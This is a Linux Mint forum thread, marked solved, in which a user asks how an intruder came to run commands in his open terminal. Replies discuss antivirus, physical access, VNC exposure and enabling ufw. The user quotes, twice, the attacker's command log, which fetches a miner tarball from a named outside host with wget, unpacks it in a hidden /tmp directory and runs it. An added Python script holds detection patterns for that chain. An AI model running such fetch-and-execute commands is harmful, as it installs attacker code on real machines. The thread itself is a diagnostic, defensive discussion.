How did I get hacked? - Solved


Post by PPPeter »

Hi all, hoping someone can help me with some security advice.

I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following morning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):

peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load of error messages so the hacker was out of luck.

I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.

I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.

Thanks in advance.
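A defender-side way to spot this drop-and-run chain in a shell history or terminal transcript, added here as an example and not code from the original thread: the sample history is constructed from the commands above (the download host is a placeholder), and the rule set, the retry heuristic and the three-stage threshold are assumptions of this example.

```python
import difflib
import re

# Constructed sample (not from a real system): the commands from the thread as they
# would sit in ~/.bash_history, prompts stripped; the download host is a placeholder.
SAMPLE_HISTORY = """\
lspci
cat /proc/cpuinfo
cd /tmp
mkdir ...
cd ...
wget example.invalid/aeon.tgz
tar xvf aeon.tgz
rm -rf aeon.tgz
cd .x
chmpd +x *
chmod +x *
screen
./x.sh
"""

# One regex per stage of the chain seen above (assumed rule set): hide in a
# dot-directory (ignoring plain "cd ." / "cd .."), fetch an archive, unpack it,
# make every file executable, detach a session, run the dropped script.
RULES = {
    "hidden_dir": re.compile(r"^(?:mkdir|cd)\s+(?:/tmp/)?(?!\.\.?\s*$)\.[\w.]*\s*$"),
    "archive_download": re.compile(r"^(?:wget|curl)\s+\S+\.(?:tgz|tar\.gz|tar|zip)\b"),
    "archive_unpack": re.compile(r"^tar\s+x"),
    "chmod_all_exec": re.compile(r"^chmod\s+\+x\s+\*"),
    "detached_session": re.compile(r"^(?:screen|tmux|nohup)\b"),
    "run_local_script": re.compile(r"^\./\S+\.sh\b"),
}

def looks_like_retry(prev, cur):
    """A near-identical command retyped right after (chmpd -> chmod) is a keyboard
    typo: evidence of an interactive human rather than a script."""
    return prev != cur and difflib.SequenceMatcher(None, prev, cur).ratio() >= 0.85

def analyse(history):
    """Map each stage to its matching lines, collect typo/retry pairs, give a verdict."""
    lines = [ln.strip() for ln in history.splitlines() if ln.strip()]
    hits = {name: [ln for ln in lines if rx.search(ln)] for name, rx in RULES.items()}
    stages = [name for name, found in hits.items() if found]
    retries = [(a, b) for a, b in zip(lines, lines[1:]) if looks_like_retry(a, b)]
    # Three or more stages including an execution step is the full chain, not noise.
    suspicious = len(stages) >= 3 and bool(hits["chmod_all_exec"] or hits["run_local_script"])
    return {"stages": stages, "hits": hits, "retries": retries, "suspicious": suspicious}
```

Run it over `~/.bash_history` of the affected account (or a saved transcript) after copying that file off the box; the retry pair is what backs up the "a human typed this" observation later in the thread.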

Re: Not another Mint anti virus question.

Post by PPPeter »

Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitely is necessary

Re: Not another Mint anti virus question.

Post by Moem »

PPPeter wrote:Why do so many people say that you don't need anti-virus for Linux?
Because it's true.

And even if it's true that you got hacked, that is a very different thing than a virus. Let's not confuse things.

Re: Not another Mint anti virus question.

Post by Pjotr »

PPPeter wrote:Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitely is necessary
More proof please.

And even if you could supply this proof: why do you think that AV would have protected you against this hijack attempt?
Tip: 10 things to do after installing Linux Mint 21.3 Virginia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

Re: Not another Mint anti virus question.

Post by Cosmo. »

PPPeter wrote:After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
This would have been the most stupid attacker, if he demonstrates his activity in such an obvious way. Actually this looks like somebody had local access. No AV would be able to do something against that. - And you seem to have made the mistake of not at least locking your screen overnight.

Or with another attempt to interpret your post: If you should really have done nothing except what you described: Then it would mean that the attack was built inside of your system. Think about it.
If I look at your other post / thread, then it is obvious that what you wrote here (installed nothing from outside of the official repositories) is simply untrue. Think about that also.

Re: How did I get hacked?

Post by Pjotr »

A hacking attempt has nothing to do at all with a virus. So antivirus certainly wouldn't have helped against this. I advise to remove that newly installed AV from your system, because it'll only make it less secure.

It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.

Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.

Keep your system fully updated, don't install stuff from non-official repos, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux. :mrgreen:

Re: Not another Mint anti virus question.

Post by Pjotr »

This is the link to the separate topic that PPPeter has started for his problem:
viewtopic.php?f=18&t=263447

--Edit: rectified.

Re: Not another Mint anti virus question.

Post by Cosmo. »

This thread is what I mentioned in my last sentence.

Re: Not another Mint anti virus question.

Post by Pjotr »

Cosmo. wrote:This thread is, what I mentioned in my last sentence.
Yes, sorry, my wording was inexact. I'll rectify my previous message.

Re: How did I get hacked?

Post by Cosmo. »

The line alone where "chmod" had been mistyped at first makes it obvious that there was a human at work.

Re: How did I get hacked?

Post by tdockery97 »

You may want to turn your firewall on also. :wink:

Re: Not another Mint anti virus question.

Post by PPPeter »

Proof: these are the commands (output omitted for brevity) I found in the terminal window:
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I agree, it must have been a very stupid attacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing else other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling, I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never accessed my email accounts in Linux.

Re: How did I get hacked?

Post by PPPeter »

Thanks for the replies. I am 100% certain it was not a local attack, I live alone and my property is secure. I haven't yet installed an anti-virus, perhaps I don't need to. I will certainly be more security conscious in future and shutdown the PC whenever I am not physically present. I only left it on as I was running Handbrake in batch mode. That's all done now.

Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?

Thanks again.

Re: How did I get hacked?

Post by Pierre »

The firewall in Linux Mint is installed, but not turned on:

Open a Terminal and type

sudo ufw status

and that will tell you if the firewall is active or not. If it isn't then type

sudo ufw enable

Re: How did I get hacked? - Solved

Post by PPPeter »

Great stuff. Thanks very much!

Re: Not another Mint anti virus question.

Post by thx-1138 »

https://www.virustotal.com/#/file/21587 ... /detection
So you can be certain that AV wouldn't have helped...

...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak

Re: Not another Mint anti virus question.

Post by greerd »

PPPeter wrote: Wed Feb 07, 2018 7:59 am
I don't see how remote access would open or leave open a terminal window on your desktop by using ssh or any terminal access, the only way that this could be done (afaik) is to use a vnc program that logs into DESKTOP:0.

You mentioned in an earlier post that you searched for info on vnc, did you go through setting up Desktop Sharing (vino)? If so did you leave it enabled and leave all security settings unchecked?

The firewall in Mint isn't enabled by default, was it enabled (to default allow-out, deny-in) during your episode?

Re: How did I get hacked? - Solved

Post by chrisuk »

Assuming that I've not misunderstood your post:

Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.

Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you were either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.

However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they were doing.

So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who ;)

Re: How did I get hacked? - Solved

Post by Ozo »

Don't be gullible. This poster just signed on so has no history on this forum. My conspiracy theory is that they made this up as they could not actually hack Linux themselves. This could be an attempt at spreading fear among the users. I for one am not afraid which is one reason I can see right through stuff like this.

I apologize to the OP if I am wrong but I do not believe in coincidence.

Re: How did I get hacked? - Solved

Post by Pjotr »

chrisuk wrote: Wed Feb 07, 2018 12:09 pm If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.
Nobody said that.

@Ozo: that thought has crossed my mind as well.